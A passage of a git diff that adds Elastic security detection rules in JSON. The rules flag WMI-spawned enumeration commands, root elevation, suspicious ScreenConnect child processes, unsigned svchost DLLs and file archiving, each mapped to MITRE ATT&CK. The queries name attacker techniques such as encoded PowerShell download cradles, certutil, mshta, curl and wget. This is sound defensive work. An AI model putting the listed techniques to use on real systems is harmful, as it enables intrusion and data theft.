\"systeminfo.exe\",\n \"tasklist.exe\",\n \"tracert.exe\",\n \"whoami.exe\"\n ) and\n process.parent.name:\"wmiprvse.exe\" and \n not (\n process.name : \"sc.exe\" and process.args : \"RemoteRegistry\" and process.args : \"start=\" and \n process.args : (\"demand\", \"disabled\")\n ) and\n not process.args : \"tenable_mw_scan\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "770e0c4d-b998-41e5-a62e-c7901fd7f470", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1018", + "name": "Remote System Discovery", + "reference": "https://attack.mitre.org/techniques/T1018/" + }, + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/" + }, + { + "id": "T1518", + "name": "Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/" + }, + { + "id": "T1016", + "name": "System Network Configuration Discovery", + "reference": "https://attack.mitre.org/techniques/T1016/", + "subtechnique": [ + { + "id": "T1016.001", + "name": "Internet Connection Discovery", + "reference": "https://attack.mitre.org/techniques/T1016/001/" + } + ] + }, + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "770e0c4d-b998-41e5-a62e-c7901fd7f470_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_111.json b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_111.json new file mode 100644 index 00000000000..ec5ccc9e0a9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_111.json @@ -0,0 +1,142 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies native Windows host and network enumeration commands spawned by the Windows Management Instrumentation Provider Service (WMIPrvSE).", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Enumeration Command Spawned via WMIPrvSE", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.command_line != null and \n process.name:\n (\n \"arp.exe\",\n \"dsquery.exe\",\n \"dsget.exe\",\n \"gpresult.exe\",\n \"hostname.exe\",\n \"ipconfig.exe\",\n \"nbtstat.exe\",\n \"net.exe\",\n \"net1.exe\",\n \"netsh.exe\",\n \"netstat.exe\",\n \"nltest.exe\",\n \"ping.exe\",\n \"qprocess.exe\",\n \"quser.exe\",\n \"qwinsta.exe\",\n \"reg.exe\",\n \"sc.exe\",\n \"systeminfo.exe\",\n \"tasklist.exe\",\n \"tracert.exe\",\n \"whoami.exe\"\n ) and\n process.parent.name:\"wmiprvse.exe\" and \n not (\n process.name : \"sc.exe\" and process.args : \"RemoteRegistry\" and process.args : \"start=\" and \n process.args : (\"demand\", \"disabled\")\n ) and\n not process.args : \"tenable_mw_scan\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "770e0c4d-b998-41e5-a62e-c7901fd7f470", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1018", + "name": "Remote System Discovery", + "reference": "https://attack.mitre.org/techniques/T1018/" + }, + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/" + }, + { + "id": "T1518", + "name": "Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/" + }, + { + "id": "T1016", + "name": "System Network Configuration Discovery", + "reference": "https://attack.mitre.org/techniques/T1016/", + "subtechnique": [ + { + "id": "T1016.001", + "name": "Internet Connection Discovery", + "reference": "https://attack.mitre.org/techniques/T1016/001/" + } + ] + }, + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "770e0c4d-b998-41e5-a62e-c7901fd7f470_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7787362c-90ff-4b1a-b313-8808b1020e64_2.json b/packages/security_detection_engine/kibana/security_rule/7787362c-90ff-4b1a-b313-8808b1020e64_2.json new file mode 100644 index 00000000000..5223e382518 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7787362c-90ff-4b1a-b313-8808b1020e64_2.json @@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the elevation of regular user permissions to root permissions through a previously unknown executable. Attackers may attempt to evade detection by hijacking the execution flow and hooking certain functions/syscalls through a rootkit in order to provide easy access to root via a special modified command.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "UID Elevation from Previously Unknown Executable", + "new_terms_fields": [ + "host.id", + "process.executable", + "process.command_line" + ], + "query": "host.os.type:\"linux\" and event.category:\"process\" and event.action:\"uid_change\" and event.type:\"change\" and user.id:\"0\"\nand process.parent.name:(\"bash\" or \"dash\" or \"sh\" or \"tcsh\" or \"csh\" or \"zsh\" or \"ksh\" or \"fish\") and not (\n process.executable:(\n /bin/* or /usr/bin/* or /sbin/* or /usr/sbin/* or /snap/* or /tmp/newroot/* or /var/lib/docker/* or /usr/local/*\n ) or\n process.name:(\n \"bash\" or \"dash\" or \"sh\" or \"tcsh\" or \"csh\" or \"zsh\" or \"ksh\" or \"fish\" or \"sudo\" or \"su\" or \"apt\" or \"apt-get\" or\n \"aptitude\" or \"squid\" or \"snap\" or \"fusermount\" or \"pkexec\" or \"umount\" or \"master\" or \"omsbaseline\" or \"dzdo\" or\n \"sandfly\" or \"logrotate\"\n ) or\n process.args:/usr/bin/python*\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "7787362c-90ff-4b1a-b313-8808b1020e64", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.013", + "name": "KernelCallbackTable", + "reference": "https://attack.mitre.org/techniques/T1574/013/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 2 + }, + "id": "7787362c-90ff-4b1a-b313-8808b1020e64_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/78de1aeb-5225-4067-b8cc-f4a1de8a8546_1.json b/packages/security_detection_engine/kibana/security_rule/78de1aeb-5225-4067-b8cc-f4a1de8a8546_1.json new file mode 100644 index 00000000000..9ed532502bb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/78de1aeb-5225-4067-b8cc-f4a1de8a8546_1.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious processes being spawned by the ScreenConnect client processes. This activity may indicate execution abusing unauthorized access to the ScreenConnect remote access software.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "logs-system.security*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious ScreenConnect Client Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name :\n (\"ScreenConnect.ClientService.exe\",\n \"ScreenConnect.WindowsClient.exe\",\n \"ScreenConnect.WindowsBackstageShell.exe\",\n \"ScreenConnect.WindowsFileManager.exe\") and\n (\n (process.name : \"powershell.exe\" and\n process.args : (\"-enc\", \"-ec\", \"-e\", \"*downloadstring*\", \"*Reflection.Assembly*\", \"*http*\")) or\n (process.name : \"cmd.exe\" and process.args : \"/c\") or\n (process.name : \"net.exe\" and process.args : \"/add\") or\n (process.name : \"schtasks.exe\" and process.args : (\"/create\", \"-create\")) or\n (process.name : \"sc.exe\" and process.args : \"create\") or\n (process.name : \"rundll32.exe\" and not process.args : \"url.dll,FileProtocolHandler\") or\n (process.name : \"msiexec.exe\" and process.args : (\"/i\", \"-i\") and\n process.args : (\"/q\", \"/quiet\", \"/qn\", \"-q\", \"-quiet\", \"-qn\", \"-Q+\")) or\n process.name : (\"mshta.exe\", \"certutil.exe\", \"bistadmin.exe\", \"certreq.exe\", \"wscript.exe\", \"cscript.exe\", \"curl.exe\", \n \"ssh.exe\", \"scp.exe\", \"wevtutil.exe\", \"wget.exe\", \"wmic.exe\")\n )\n", + "references": [ + "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "78de1aeb-5225-4067-b8cc-f4a1de8a8546", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1219", + "name": "Remote Access Software", + "reference": "https://attack.mitre.org/techniques/T1219/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "78de1aeb-5225-4067-b8cc-f4a1de8a8546_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_6.json b/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_6.json new file mode 100644 index 00000000000..9100842170e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_6.json @@ -0,0 +1,144 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an unsigned library created in the last 5 minutes and subsequently loaded by a shared windows service (svchost). Adversaries may use this technique to maintain persistence or run with System privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.library-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unsigned DLL Loaded by Svchost", + "query": "library where host.os.type == \"windows\" and\n\n process.executable : \n (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\Syswow64\\\\svchost.exe\") and \n \n dll.code_signature.trusted != true and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and \n \n dll.hash.sha256 != null and \n \n (\n /* DLL created within 5 minutes of the library load event - compatible with Elastic Endpoint 8.4+ */\n dll.Ext.relative_file_creation_time <= 300 or \n \n /* unusual paths */\n dll.path :(\"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\PerfLogs\\\\*\",\n \"?:\\\\Windows\\\\Tasks\\\\*\",\n \"?:\\\\Intel\\\\*\",\n \"?:\\\\AMD\\\\Temp\\\\*\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*\",\n \"?:\\\\Windows\\\\ServiceState\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"?:\\\\Windows\\\\Branding\\\\*\",\n \"?:\\\\Windows\\\\csc\\\\*\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"?:\\\\Windows\\\\en-US\\\\*\",\n \"?:\\\\Windows\\\\wlansvc\\\\*\",\n \"?:\\\\Windows\\\\Prefetch\\\\*\",\n \"?:\\\\Windows\\\\Fonts\\\\*\",\n \"?:\\\\Windows\\\\diagnostics\\\\*\",\n \"?:\\\\Windows\\\\TAPI\\\\*\",\n \"?:\\\\Windows\\\\INF\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"?:\\\\windows\\\\tracing\\\\*\",\n \"?:\\\\windows\\\\IME\\\\*\",\n \"?:\\\\Windows\\\\Performance\\\\*\",\n \"?:\\\\windows\\\\intel\\\\*\",\n \"?:\\\\windows\\\\ms\\\\*\",\n \"?:\\\\Windows\\\\dot3svc\\\\*\",\n \"?:\\\\Windows\\\\panther\\\\*\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*\",\n \"?:\\\\Windows\\\\OCR\\\\*\",\n \"?:\\\\Windows\\\\appcompat\\\\*\",\n \"?:\\\\Windows\\\\apppatch\\\\*\",\n \"?:\\\\Windows\\\\addins\\\\*\",\n \"?:\\\\Windows\\\\Setup\\\\*\",\n \"?:\\\\Windows\\\\Help\\\\*\",\n \"?:\\\\Windows\\\\SKB\\\\*\",\n \"?:\\\\Windows\\\\Vss\\\\*\",\n \"?:\\\\Windows\\\\servicing\\\\*\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*\",\n \"?:\\\\Windows\\\\Logs\\\\*\",\n \"?:\\\\Windows\\\\WaaS\\\\*\",\n \"?:\\\\Windows\\\\twain_32\\\\*\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*\",\n \"?:\\\\Windows\\\\PLA\\\\*\",\n \"?:\\\\Windows\\\\Migration\\\\*\",\n \"?:\\\\Windows\\\\debug\\\\*\",\n \"?:\\\\Windows\\\\Cursors\\\\*\",\n \"?:\\\\Windows\\\\Containers\\\\*\",\n \"?:\\\\Windows\\\\Boot\\\\*\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*\",\n \"?:\\\\Windows\\\\TextInput\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\schemas\\\\*\",\n \"?:\\\\Windows\\\\SchCache\\\\*\",\n \"?:\\\\Windows\\\\Resources\\\\*\",\n \"?:\\\\Windows\\\\rescache\\\\*\",\n \"?:\\\\Windows\\\\Provisioning\\\\*\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"?:\\\\Windows\\\\media\\\\*\",\n \"?:\\\\Windows\\\\Globalization\\\\*\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"?:\\\\$Recycle.Bin\\\\*\")\n ) and \n \n not dll.hash.sha256 : \n (\"3ed33e71641645367442e65dca6dab0d326b22b48ef9a4c2a2488e67383aa9a6\", \n \"b4db053f6032964df1b254ac44cb995ffaeb4f3ade09597670aba4f172cf65e4\", \n \"214c75f678bc596bbe667a3b520aaaf09a0e50c364a28ac738a02f867a085eba\", \n \"23aa95b637a1bf6188b386c21c4e87967ede80242327c55447a5bb70d9439244\", \n \"5050b025909e81ae5481db37beb807a80c52fc6dd30c8aa47c9f7841e2a31be7\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "dll.Ext.relative_file_creation_time", + "type": "unknown" + }, + { + "ecs": true, + "name": "dll.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "dll.hash.sha256", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "78ef0c95-9dc2-40ac-a8da-5deb6293a14e", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1569", + "name": "System Services", + "reference": "https://attack.mitre.org/techniques/T1569/", + "subtechnique": [ + { + "id": "T1569.002", + "name": "Service Execution", + "reference": "https://attack.mitre.org/techniques/T1569/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "78ef0c95-9dc2-40ac-a8da-5deb6293a14e_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_2.json b/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_2.json new file mode 100644 index 00000000000..36c82ad0572 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_2.json @@ -0,0 +1,158 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Detects files being compressed or archived into common formats. This is a common technique used to obfuscate files to evade detection or to staging data for exfiltration.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 1000, + "name": "File Compressed or Archived into Common Format", + "query": "file where event.type in (\"creation\", \"change\") and process.executable != null and not user.id : \"S-1-5-18\" and\n file.Ext.header_bytes : (\n /* compression formats */\n \"1F9D*\", /* tar zip, tar.z (Lempel-Ziv-Welch algorithm) */\n \"1FA0*\", /* tar zip, tar.z (LZH algorithm) */\n \"425A68*\", /* Bzip2 */\n \"524E4301*\", /* Rob Northen Compression */\n \"524E4302*\", /* Rob Northen Compression */\n \"4C5A4950*\", /* LZIP */\n \"504B0*\", /* ZIP */\n \"526172211A07*\", /* RAR compressed */\n \"44434D0150413330*\", /* Windows Update Binary Delta Compression file */\n \"50413330*\", /* Windows Update Binary Delta Compression file */\n \"377ABCAF271C*\", /* 7-Zip */\n \"1F8B*\", /* GZIP */\n \"FD377A585A00*\", /* XZ, tar.xz */\n \"7801*\",\t /* zlib: No Compression (no preset dictionary) */\n \"785E*\",\t /* zlib: Best speed (no preset dictionary) */\n \"789C*\",\t /* zlib: Default Compression (no preset dictionary) */\n \"78DA*\", \t /* zlib: Best Compression (no preset dictionary) */\n \"7820*\",\t /* zlib: No Compression (with preset dictionary) */\n \"787D*\",\t /* zlib: Best speed (with preset dictionary) */\n \"78BB*\",\t /* zlib: Default Compression (with preset dictionary) */\n \"78F9*\",\t /* zlib: Best Compression (with preset dictionary) */\n \"62767832*\", /* LZFSE */\n \"28B52FFD*\", /* Zstandard, zst */\n \"5253564B44415441*\", /* QuickZip rs compressed archive */\n \"2A2A4143452A2A*\", /* ACE */\n\n /* archive formats */\n \"2D686C302D*\", /* lzh */\n \"2D686C352D*\", /* lzh */\n \"303730373037*\", /* cpio */\n \"78617221*\", /* xar */\n \"4F4152*\", /* oar */\n \"49536328*\" /* cab archive */\n ) and\n not (\n (\n process.name : \"firefox.exe\" and\n process.code_signature.subject_name : \"Mozilla Corporation\" and process.code_signature.trusted == true\n ) or\n (\n process.name : \"wazuh-agent.exe\" and\n process.code_signature.subject_name : \"Wazuh, Inc\" and process.code_signature.trusted == true and\n file.name : (\"ossec-*.log.gz\", \"tmp-entry.gz\", \"tmp-entry\", \"last-entry.gz\")\n ) or\n (\n process.name : \"excel.exe\" and\n process.code_signature.subject_name : \"Microsoft Corporation\" and process.code_signature.trusted == true and\n file.extension : (\"tmp\", \"xlsx\", \"gz\", \"xlsb\", \"xar\", \"xslm\")\n ) or\n (\n process.name : \"Dropbox.exe\" and\n process.code_signature.subject_name : \"Dropbox, Inc\" and process.code_signature.trusted == true and\n file.name : \"store.bin\"\n ) or\n (\n process.name : \"DellSupportAssistRemedationService.exe\" and\n process.code_signature.subject_name : \"Dell Inc\" and process.code_signature.trusted == true and\n file.extension : \"manifest\"\n )\n )\n", + "references": [ + "https://en.wikipedia.org/wiki/List_of_file_signatures" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "79124edf-30a8-4d48-95c4-11522cad94b1", + "severity": "low", + "tags": [ + "Data Source: Elastic Defend", + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Tactic: Collection", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1560", + "name": "Archive Collected Data", + "reference": "https://attack.mitre.org/techniques/T1560/", + "subtechnique": [ + { + "id": "T1560.001", + "name": "Archive via Utility", + "reference": "https://attack.mitre.org/techniques/T1560/001/" + } + ] + }, + { + "id": "T1074", + "name": "Data Staged", + "reference": "https://attack.mitre.org/techniques/T1074/", + "subtechnique": [ + { + "id": "T1074.001", + "name": "Local Data Staging", + "reference": "https://attack.mitre.org/techniques/T1074/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1132", + "name": "Data Encoding", + "reference": "https://attack.mitre.org/techniques/T1132/", + "subtechnique": [ + { + "id": "T1132.001", + "name": "Standard Encoding", + "reference": "https://attack.mitre.org/techniques/T1132/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "79124edf-30a8-4d48-95c4-11522cad94b1_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_3.json b/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_3.json new file mode 